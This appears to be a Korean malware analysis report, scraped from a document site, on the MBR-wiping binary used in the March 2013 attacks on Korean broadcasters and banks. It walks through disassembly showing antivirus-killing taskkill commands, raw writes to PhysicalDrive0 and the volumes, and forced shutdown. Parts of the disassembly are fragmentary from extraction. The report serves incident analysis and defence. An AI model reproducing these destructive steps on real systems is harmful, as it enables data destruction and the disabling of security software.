3.20 테러 악성코드바이너리분석 손충호 (StolenByte) WOWHACKER Group 해당문서는 WOWHACKER Group 의문서이므로, 무단도용및수 정및변조는할수없습니다. 페이지 1 / 20

Size: px

Start display at page:

Download "3.20 테러 악성코드바이너리분석 손충호 (StolenByte) WOWHACKER Group 해당문서는 WOWHACKER Group 의문서이므로, 무단도용및수 정및변조는할수없습니다. 페이지 1 / 20"

주영 여
5 years ago
Views:

1 3.20 테러 악성코드바이너리분석 손충호 (StolenByte) WOWHACKER Group 해당문서는 WOWHACKER Group 의문서이므로, 무단도용및수 정및변조는할수없습니다. 페이지 1 / 20

2 전체적인공격프로세스 페이지 2 / 20

1. 바이너리가사용할 LoadLibrary 하여함수 Load Ntdll.dll Kernel32.dll advapi32.dll Secur32.dll Shlwapi.dll GDI32.dll RPCRT4.dll USER32.dll Msvcrt.dll IMM32.dll USP10.dll LPK.

3 1. 바이너리가사용할 LoadLibrary 하여함수 Load Ntdll.dll Kernel32.dll advapi32.dll Secur32.dll Shlwapi.dll GDI32.dll RPCRT4.dll USER32.dll Msvcrt.dll IMM32.dll USP10.dll LPK.dll [ 그림 1] Load 된 Library 해당 API 주소를얻어오는과정이백신의탐지를벗어나기위해사용되는것으로추정된다. 2. OpenFileMappingA 시도 CA. 57 PUSH EDI ; ApcRunCm CB. 8DBE F LEA EDI,DWORD PTR DS:[ESI+4F8] D1. 57 PUSH EDI ; ApcRunCm D2. 33DB XOR EBX,EBX D4. 53 PUSH EBX D5. 6A 04 PUSH D7. FF CALL DWORD PTR DS:[ESI+334] ;kernel32.openfilemappinga 0012FE FE FE5C ApcRunCm 페이지 3 / 20

4 [ OpenFileMappingA Parameter ] 해당위치에서 OpenFileMappingA 하는행위는다음과같다. OpenFileMappingA(FILE_MAP_READ, 0, JO CRAS PCI8273V ); 해당공격을당한이후에는해당바이너리가다시는실행되는일이없는데, OpenFileMappingA 로 Open 이된다면공격이되지않는시스템으로간주하여, 바로종료하게된다. 3. OpenFileMappingA 시도실패했을경우, CreateFileMappingA [ 그림 2] OpenFileMappingA Return Value [ 그림 3] EAX == Return Value 현시스템에서는처음실행상태이기때문에, Open 에실패할수밖에없는상황이다. 바이너리에서는 Open 을실패하게되면 CreateFileMappingA 로생성을시도한다 E5. 57 PUSH EDI E6. 6A 10 PUSH E8. 53 PUSH EBX E9. 6A 04 PUSH EB. 53 PUSH EBX EC. 6A FF PUSH EE. FF CALL DWORD PTR DS:[ESI+338] ; kernel32.createfilemappinga 0012FE48 FFFFFFFF 0012FE4C FE 페이지 4 / 20

5 0012FE FE FE5C ApcRunCm [ CreateFileMappingA Parameter ] 해당위치에서 CreateFileMappingA하는행위는다음과같다. CreateFileMappingA(-1, NULL, PAGE_READWRITE, 0, 10, JO CRAS PCI8273V ); 4. GetWindowsDirectoryA 를통해시스템폴더경로가져오기 F PUSH F9. 8D85 F4FEFFFF LEA EAX,[LOCAL.67] FF. 50 PUSH EAX FF96 3C CALL DWORD PTR DS:[ESI+33C] ; kernel32.getwindowsdirectorya 0012FE FE6C 0012FE5C [ GetWindowsDirectoryA Parameter ] 0012FE6C 43 3A 5C E 44 4F C:\WINDOWS [ GetWindowsDirectory 결과값 ] 5. strcat 을통해파일경로완성 D86 2E LEA EAX,DWORD PTR DS:[ESI+52E] C. 50 PUSH EAX D. 8D85 F4FEFFFF LEA EAX,[LOCAL.67] PUSH EAX FF96 A CALL DWORD PTR DS:[ESI+3A8] ; msvcrt.strcat 0012FE FE5C 0012FE6C ASCII "C:\\WINDOWS" C7 ASCII "\\Temp\\~v3.log" [ strcat Parameter ] 페이지 5 / 20

6 0012FE6C 43 3A 5C E 44 4F C D 70 5C C:\WINDOWS\Temp\ 0012FE7C 7E E 6C 6F 67 ~v3.log [ 완성된경로 ] 6. PathFileExistsA 를통해 strcat 으로완성한경로, 존재여부확인 C. 8D85 F4FEFFFF LEA EAX,[LOCAL.67] PUSH EAX FF96 CC CALL DWORD PTR DS:[ESI+3CC] ; shlwapi.pathfileexistsa 0012FE5C 0012FE6C ASCII "C:\\WINDOWS\\Temp\\~v3.log" [ PathFileExistsA Parameter ] [ 그림 4] PathFileExistsA Return Value [ 그림 5] EAX == Return Value == FALSE 현재시스템은바이너리를처음실행시킨상태라파일이존재하지않는다. 7. 파일이존재하지않을경우, 명령실행 BA. 8D86 B LEA EAX,DWORD PTR DS:[ESI+5B3] Address=00402A4C, (ASCII "taskkill /F /IM pasvc.exe") [ Execute Command ] B8. 6A 00 PUSH BA. 8D86 B LEA EAX,DWORD PTR DS:[ESI+5B3] C0. 8DBE LEA EDI,DWORD PTR DS:[ESI+394] C6. 50 PUSH EAX ; ApcRunCm.00402A4C 페이지 6 / 20

7 004021C7. FF17 CALL DWORD PTR DS:[EDI] ; kernel32.winexec 0012FE A4C ASCII "taskkill /F /IM pasvc.exe" 0012FE4C [ WinExec1 Parameter ] 해당위치에서 WinExec하는행위는다음과같다. WinExec("taskkill /F /IM pasvc.exe, SW_HIDE); C9. 6A 00 PUSH CB. 81C6 CD ADD ESI,5CD D1. 56 PUSH ESI ; ApcRunCm.00402A D2. FF17 CALL DWORD PTR DS:[EDI] ; kernel32.winexec 0012FE A66 ASCII "taskkill /F /IM clisvc.exe" 0012FE4C [ WinExec2 Parameter ] 해당위치에서 WinExec하는행위는다음과같다. WinExec ("taskkill /F /IM clisvc.exe", SW_HIDE); 8. 파일이존재하지않을경우, CreateThread 로 Thread 생성 C. 8D45 08 LEA EAX,[ARG.1] F. 50 PUSH EAX PUSH EBX PUSH ESI ; ApcRunCm JE SHORT ApcRunCm C FFB PUSH DWORD PTR DS:[ESI+260] ; ApcRunCm E A. EB 06 JMP SHORT ApcRunCm C > FFB PUSH DWORD PTR DS:[ESI+280] ; ApcRunCm.00401AB > 53 PUSH EBX PUSH EBX FF CALL DWORD PTR DS:[ESI+344] ; kernel32.createthread 페이지 7 / 20

8 0012FE FE4C FE AB9 ApcRunCm.00401AB9 0012FE ApcRunCm FE FE5C 0012FF80 [ CreateThread Parameter ] 해당위치에서 CreateThread가하는행위는다음과같다. CreateThread(NULL, 0, 0x401AB9( 함수주소 ), 0x402499(Parameter 주소 ), 0, 0x12FF80(0)); E. 6A FF PUSH PUSH EAX FF CALL DWORD PTR DS:[ESI+348] ; kernel32.waitforsingleobject Thread가끝날때까지, 대기 9. [Thread 1] PhysicalDrive CreateFile 로 Open E. 6A FF PUSH PUSH EAX FF CALL DWORD PTR DS:[ESI+348] ; kernel32.waitforsingleobject 009EFCE0 009EFD08 ASCII "\\\\.\\PhysicalDrive0" 009EFCE4 C EFCE EFCEC EFCF EFCF EFCF [ CreateFile Parameter ] 해당위치에서 CreateFile가하는행위는다음과같다. CreateFile( \\\\.\\PhysicalDrive0, GENERIC_READ GENERIC_WRITE (0xC ), FILE_SHARE_READ FILE_SHARE_WRITE (3), NULL, OPEN_EXISTING, 0, NULL); PhysicalDrive0 을 Open 을하게되면 MBR 로직접접근이가능하다. 페이지 8 / 20

9 10. [Thread 1] SetFilePointer 이용하여, PhysicalDrive0 위치설정후 ReadFile로복사 00401ED2. 6A 00 PUSH ED C MOV [ARG.2],EAX 00401ED7. 8D45 0C LEA EAX,[ARG.2] 00401EDA. 50 PUSH EAX 00401EDB. C1E6 09 SHL ESI, EDE. 56 PUSH ESI 00401EDF. FF77 40 PUSH DWORD PTR DS:[EDI+40] 00401EE2. FF CALL DWORD PTR DS:[EDI+380] ; kernel32.setfilepointer 009EFAB EFAB EFABC 009EFADC 009EFAC [ SetFilePointer Parameter ] 해당위치에서 SetFilePointer 가하는행위는다음과같다. SetFilePointer(CreateFile Handle( \\\\.\\PhysicalDrive0 ), 0, NULL, FILE_BEGIN); 00401EF0 > \6A 00 PUSH EF2. 8D45 FC LEA EAX,[LOCAL.1] 00401EF5. 50 PUSH EAX 00401EF PUSH EFB. FF75 10 PUSH [ARG.3] 00401EFE. FF77 40 PUSH DWORD PTR DS:[EDI+40] 00401F01. FF CALL DWORD PTR DS:[EDI+390] ; kernel32.readfile 009EFAB EFAB4 009EFAF0 009EFAB EFABC 009EFACC 009EFAC [ ReadFile Parameter ] 해당위치에서 ReadFile 가하는행위는다음과같다. 페이지 9 / 20

10 ReadFile(CreateFile Handle( \\\\.\\PhysicalDrive0 ), 0x009EFAF0, 0x200, &NumberOfBytesRead, NULL); ReadFile 을하는이유는 MBR 를백업을하는의미라고생각한다. 11. Loop 를통해 PRINCPES * 60 번복사 ( 총 480 Byte 복사 ) E > /8D45 F4 /LEA EAX,[LOCAL.3] PUSH EAX FF96 B CALL DWORD PTR DS:[ESI+3B8] ; msvcrt.strlen ; strlen으로 PRINCPES의길이를구하여 memcpy의 Parameter로사용 PUSH EAX D45 F4 LEA EAX,[LOCAL.3] C. 50 PUSH EAX D. 8D843D F4FDFFFF LEA EAX,DWORD PTR SS:[EBP+EDI-> PUSH EAX FF96 B CALL DWORD PTR DS:[ESI+3B4] ; msvcrt.memcpy 009EFAB0 009EFACC 009EFAB4 009EFCCC ASCII "PRINCPES" 009EFAB [ memcpy Parameter ] 해당위치에서 memcpy가하는행위는다음과같다. memcpy(0x9efacc, PRINCPES, 8); 12. [Thread 1] WriteFile 로 Segment, MBR 를 10 번반복덮는다 AC. 6A 00 PUSH AE C MOV [ARG.2],EAX B1. 8D45 0C LEA EAX,[ARG.2] B4. 50 PUSH EAX B5. C1E6 09 SHL ESI, B8. 56 PUSH ESI B9. FF77 40 PUSH DWORD PTR DS:[EDI+40] BC. FF CALL DWORD PTR DS:[EDI+380] ; kernel32.setfilepointer 페이지 10 / 20

11 009EFA EFA EFA98 009EFAB8 009EFA9C [ SetFilePointer Parameter ] 해당위치에서 SetFilePointer 가하는행위는다음과같다. SetFilePointer(CreateFile Handle( \\\\.\\PhysicalDrive0 ), 0x7000, NULL, FILE_BEGIN); 0x7000 는세그먼트 Buffer 주소 CA > \6A 00 PUSH CC. 8D45 FC LEA EAX,[LOCAL.1] CF. 50 PUSH EAX D PUSH D5. FF75 10 PUSH [ARG.3] D8. FF77 40 PUSH DWORD PTR DS:[EDI+40] DB. FF CALL DWORD PTR DS:[EDI+374] ; kernel32.writefile 009EFA8C EFA90 009EFACC ASCII "PRINCPESPRINCPESPRINCPESPRINCPESPRINCPESPRINCPESPRINCPESPRINCPESPRINCPESPRIN> 009EFA EFA98 009EFAA8 009EFA9C [ WriteFile Parameter ] 해당위치에서 WriteFile가하는행위는다음과같다. WriteFile(CreateFile Handle( \\\\.\\PhysicalDrive0 ), 480Byte만큼생성한 Buffer 위치, 0x200(512), &NumberOfBytesWritten, NULL); 생성은 480Byte 만큼했는데, 512Byte 만큼덮는이유는모르겠다. 이러한비슷한과정을한번더하는데, 이번엔 Segment Buffer 주소를덮는게아닌, MBR을직접덮는다. 페이지 11 / 20

12 004020AC. 6A 00 PUSH AE C MOV [ARG.2],EAX B1. 8D45 0C LEA EAX,[ARG.2] B4. 50 PUSH EAX B5. C1E6 09 SHL ESI, B8. 56 PUSH ESI B9. FF77 40 PUSH DWORD PTR DS:[EDI+40] BC. FF CALL DWORD PTR DS:[EDI+380] ; kernel32.setfilepointer 009EFA EFA EFA98 009EFAB8 009EFA9C [ SetFilePointer Parameter ] 해당위치에서 SetFilePointer 가하는행위는다음과같다. SetFilePointer(CreateFile Handle( \\\\.\\PhysicalDrive0 ), 0, NULL, FILE_BEGIN); PhysicalDrive0 의 0 번째주소는 MBR 이존재한다. Write 는위와동일하게진행한다 DFC. 837D FC 0A CMP [LOCAL.1],0A 00401E00.^ 7C 8A \JL SHORT ApcRunCm.00401D8C 이해당과정을 10번진행한다. 13. [Thread 1] B:\\ 부터 Drive Type 가져오기 00401DFC. 837D FC 0A CMP [LOCAL.1],0A 00401E00.^ 7C 8A \JL SHORT ApcRunCm.00401D8C 009EFE04 009EFE08 009EFFAC D5 ASCII "B:\\" [ strcpy Parameter ] 00401B2B. 50 PUSH EAX 00401B2C. FF CALL DWORD PTR DS:[ESI+358] ; kernel32.getdrivetypea 페이지 12 / 20

13 009EFE18 009EFFAC 009EFFAC 42 3A 5C 00 [ GetDriveTypeA Parameter ] B:\. [ 그림 6] GetDriverType Parameter [ 그림 7] GetDriveType Return Value 00401B32. 83F8 03 CMP EAX, B JE SHORT ApcRunCm.00401B3C 00401B37. 83F8 02 CMP EAX, B3A. 75 2C JNZ SHORT ApcRunCm.00401B68 GetDriveType Return에의한분기 HDD 또는 Flash 메모리가아니면 C,D,E,F를전부탐지한다. 페이지 13 / 20

14 char drive[] = B:\\ ; drive[0]++ == C,D,E,F~~ 14. [Thread 1] 분기가맞으면, CreateThread 로 Thread 생성 00401B PUSH EAX 00401B PUSH EBX 00401B PUSH ESI ; ApcRunCm B48. FFB PUSH DWORD PTR DS:[ESI+284] ; ApcRunCm.00401B B4E. 895D F0 MOV DWORD PTR SS:[EBP-10],EBX 00401B PUSH EBX 00401B PUSH EBX 00401B53. FF CALL DWORD PTR DS:[ESI+344] ; kernel32.createthread 009EFE EFE EFE0C 00401B93 ApcRunCm.00401B93 009EFE ApcRunCm EFE EFE18 009EFFA4 [ CreateThread Parameter ] 해당위치에서 CreateThread가하는행위는다음과같다. CreateThread(NULL, 0, 0x401B93( 함수주소 ), 0x402499(Parameter 주소 ), 0, 0x9EFFA4(0)); 15. [Thread 2] HDD, Flash 메모리에대한 GetDiskFreeSpaceA 00401BDB. 8D45 E8 LEA EAX,[LOCAL.6] 00401BDE. 50 PUSH EAX 00401BDF. 8D45 E4 LEA EAX,[LOCAL.7] 00401BE2. 50 PUSH EAX 00401BE3. 8D45 08 LEA EAX,[ARG.1] 00401BE6. 50 PUSH EAX 00401BE7. 8D45 E0 LEA EAX,[LOCAL.8] 00401BEA. 50 PUSH EAX 00401BEB. 8D45 A0 LEA EAX,[LOCAL.24] 페이지 14 / 20

15 00401BEE. 50 PUSH EAX 00401BEF. FF CALL DWORD PTR DS:[ESI+388] ; kernel32.getdiskfreespacea 00AEFF34 00AEFF38 00AEFF3C 00AEFF40 00AEFF44 00AEFF54 00AEFF94 00AEFFBC 00AEFF98 00AEFF9C [ GetDiskFreeSpaceA Parameter ] 해당위치에서 GetDiskFreeSpaceA 가하는행위는다음과같다. GetDiskFreeSpaceA( C:\\, &dwsectperclust, &dwbytespersect, &dwfreeclusters, &dwtotalclusters); 이후 GetDiskFreeSpaceA 를하게되는데, 공격자의실수가있는것같다 C05. 3BC7 CMP EAX,EDI ; EDI = 0x ; EAX = 0x ; GetDiskFreeSpaceA를성공하였기때문에 EAX에 0가아닌다른값이왔는데, ; GetDiskFreeSpaceExA를다시시도한다 C07. 0F84 5B JE ApcRunCm.00401D C0D. 8D45 C C C11. 8D45 BC 00401C C C16. 8D45 A C C1A. 897D C C1D. 897D BC 00401C D C C D C C26. FF96 8C LEA EAX,[LOCAL.15] PUSH EAX LEA EAX,[LOCAL.17] PUSH EAX PUSH EDI LEA EAX,[LOCAL.24] PUSH EAX MOV [LOCAL.16],EDI MOV [LOCAL.17],EDI MOV [LOCAL.14],EDI MOV [LOCAL.15],EDI CALL DWORD PTR DS:[ESI+38C] ; kernel32.getdiskfreespaceexa 00AEFF38 00AEFF54 페이지 15 / 20

16 00AEFF3C AEFF40 00AEFF70 00AEFF44 00AEFF78 00AEFF A 5C C:\ [ GetDiskFreeSpaceExA Parameter ] 해당위치에서 GetDiskFreeSpaceExA 가하는행위는다음과같다. GetDiskFreeSpaceExA("C:\\", 0, &TotalNumberOfBytes, &TotalNumberOfFreeBytes); 16. [Thread 2] HDD, Flash 메모리 CreateFile Open 00401C PUSH EDI 00401C5A PUSH C5F. 6A 03 PUSH C PUSH EDI 00401C62. 6A 03 PUSH C C0 PUSH C C69. 8D45 A0 LEA EAX,[LOCAL.24] 00401C6C. 50 PUSH EAX 00401C6D. FF CALL DWORD PTR DS:[ESI+370] ; kernel32.createfilea 00AEFF2C 00AEFF54 ASCII "\\\\.\\C:" 00AEFF30 C AEFF AEFF AEFF3C AEFF AEFF [ CreateFileA Parameter ] 해당위치에서 CreateFile가하는행위는다음과같다. CreateFile(\\\\.\\C:, GENERIC_READ GENERIC_WRITE (0xC ), FILE_SHARE_READ FILE_SHARE_WRITE (3), NULL, OPEN_EXISTING, FILE_FLAG_NO_BUFFERING FILE_FLAG_RANDOM_ACCESS, NULL); 모든드라이브를다돌때까지 Loop를돌면서 HDD, Flash 메모리같은드라이브같은드라이브가발견되면 Thread를생성한다. 페이지 16 / 20

$C640 07 53 MOV BYTE PTR DS:[EAX+7],53 00401CD4. 83C0 0A ADD EAX,0A 00401CD7. 8D1401 LEA EDX,DWORD PTR DS:[ECX+EAX] 00401CDA. 3B55 08 CMP EDX,[ARG.1] 00401CDD.^\72 E3 \JB SHORT ApcRunCm.$

17 17. [Thread 2] 512 Byte 만큼 String 생성 00401CC2 > /C740 FF >/MOV DWORD PTR DS:[EAX-1],4E CC9. C > MOV DWORD PTR DS:[EAX+3], CD0. C MOV BYTE PTR DS:[EAX+7], CD4. 83C0 0A ADD EAX,0A 00401CD7. 8D1401 LEA EDX,DWORD PTR DS:[ECX+EAX] 00401CDA. 3B55 08 CMP EDX,[ARG.1] 00401CDD.^\72 E3 \JB SHORT ApcRunCm.00401CC2 [ Create String ] [ 그림 8] 생성된 String 18. [Thread 2] SetFilePointer 로 Pointer 지정 00401CC2 > /C740 FF >/MOV DWORD PTR DS:[EAX-1],4E CC9. C > MOV DWORD PTR DS:[EAX+3], CD0. C MOV BYTE PTR DS:[EAX+7], CD4. 83C0 0A ADD EAX,0A 00401CD7. 8D1401 LEA EDX,DWORD PTR DS:[ECX+EAX] 00401CDA. 3B55 08 CMP EDX,[ARG.1] 00401CDD.^\72 E3 \JB SHORT ApcRunCm.00401CC2 00AEFF AEFF3C AEFF40 00AEFF6C 00AEFF [ SetFilePointer Parameter ] 페이지 17 / 20

18 해당위치에서 SetFilePointer 가하는행위는다음과같다. SetFilePointer(CreateFile Handle( \\\\.\\C: ), 0, NULL, FILE_BEGIN); 19. [Thread 2] WriteFile 로생성한 String, 200 번 Write 00401D1D > /57 /PUSH EDI 00401D1E. 8D45 D0 LEA EAX,[LOCAL.12] 00401D PUSH EAX 00401D22. FF75 08 PUSH [ARG.1] 00401D D D0 MOV [LOCAL.12],EDI 00401D28. FF75 F0 PUSH [LOCAL.4] 00401D2B. FF75 EC PUSH [LOCAL.5] 00401D2E. FF CALL DWORD PTR DS:[ESI+374] ; kernel32.writefile 00AEFF AEFF ASCII "PRINCIPES" 00AEFF3C AEFF40 00AEFF84 00AEFF [ WriteFile Parameter ] 해당위치에서 WriteFile가하는행위는다음과같다. WriteFile(CreateFile Handle( \\\\.\\C: ), 512Byte만큼생성한 Buffer 위치, 0x200(512), &NumberOfBytesWritten, NULL); 00401D34. FF4D DC DEC [LOCAL.9] 00401D37.^\75 E4 \JNZ SHORT ApcRunCm.00401D1D Stack SS:[00AEFF90]=000000C8 [ Loop Count ] 20. [Thread 2] Loop 953 번돌면서해당 HDD, Flash 메모리 Write Stack SS:[00AEFFA8]=003EB9ED [ Total Loop Count ] 1 회 Loop 당 4310 (0x10D6) Count 가된다. 페이지 18 / 20

19 0x003EB9ED / 0x10D6 == 953~4 정도가 Loop 를반복하게되면서 512 (0x200) Byte 만큼덮게된 다. 21. [Thread 1] 재부팅으로최종마무리 00401B76 > \68 E PUSH 493E B7B. FF CALL DWORD PTR DS:[ESI+354] ; kernel32.sleep 009EFE E0 [ Sleep Parameter ] 약 300(300000(0x493E0)ms) 초간대기한다 A. 33FF XOR EDI,EDI C. 57 PUSH EDI D. 8D86 8E LEA EAX,DWORD PTR DS:[ESI+58E> PUSH EAX ; ApcRunCm.00402A FF CALL DWORD PTR DS:[ESI+394] ; kernel32.winexec 009EFDF A27 ASCII "shutdown -r -t 0" 009EFDF [ WinExec Parameter ] 컴퓨터종료명령어를실행한다. 그러나, Windows Vista 이후버전에서는권한문제등으로종료 가안될수있다 A PUSH F. FF CALL DWORD PTR DS:[ESI+354] ; kernel32.sleep 009EFDF [ Sleep Parameter ] 약 10 초정도대기후, SYSTEM 권한얻기작업을통해 Windows 종료를시도한다. GetCurrentProcess OpenProcessToken 페이지 19 / 20

20 LookupPrivilegeValueA AdjustTokenPrivileges 해당 API를통해, SYSTEM 권한을획득한다. 권한획득에자세한방법은 Windows 7에서 DLL Injection이필요할때, 동일한방법을이용하기때문에별도로검색을통해찾아보길바란다 B PUSH A0. 6A 05 PUSH A2. FF96 D CALL DWORD PTR DS:[ESI+3D0] ; USER32.ExitWindowsEx 009EFDEC EFDF [ ExitWindowsEx Parameter ] ExitWindowsEx는 Windows를종료하게해주는 API 이지만, SYSTEM 권한이없으면작동에오작동이있을수있다. 해당위치에서 ExitWindowsEx 가하는행위는다음과같다. ExitWindowsEx( EWX_FORCE, SHTDN_REASON_FLAG_PLANNED SHTDN_REASON_MINOR_UPGRADE SHTDN_REASON_MAJOR_OPERATINGSYSTEM ); Windows 가강제로종료된다. 22. 마무리 이와같은과정을전부다통과하면, 자동으로 Windows가재부팅또는종료가된다. 기존 C 드라이브같은경우도 Dummy값으로일부덮어버렸기때문에, MBR을복구한다고할지라도쉽게 C 드라이브같은영역은복구하기힘들것이라예상된다. 페이지 20 / 20

CKKeyPro 적용가이드

CKKeyPro 적용가이드 3.20 사이버테러악성코드분석보고서 라온시큐어보안기술연구팀 작성일 : 2013. 03 페이지 : 1/15 Introduction 2013년 3월 20일오후, MBC, KBS, YTN, 농협, 신한은행, 제주은행전산망장애가동시에발생하였다. 피해기관들의호스트약 500여대에오류메시지가화면에나타났으며악성코드에감염된호스트는사용할수없는상태가되었다. 현재까지정확한침투경로가밝혀지지않고있다.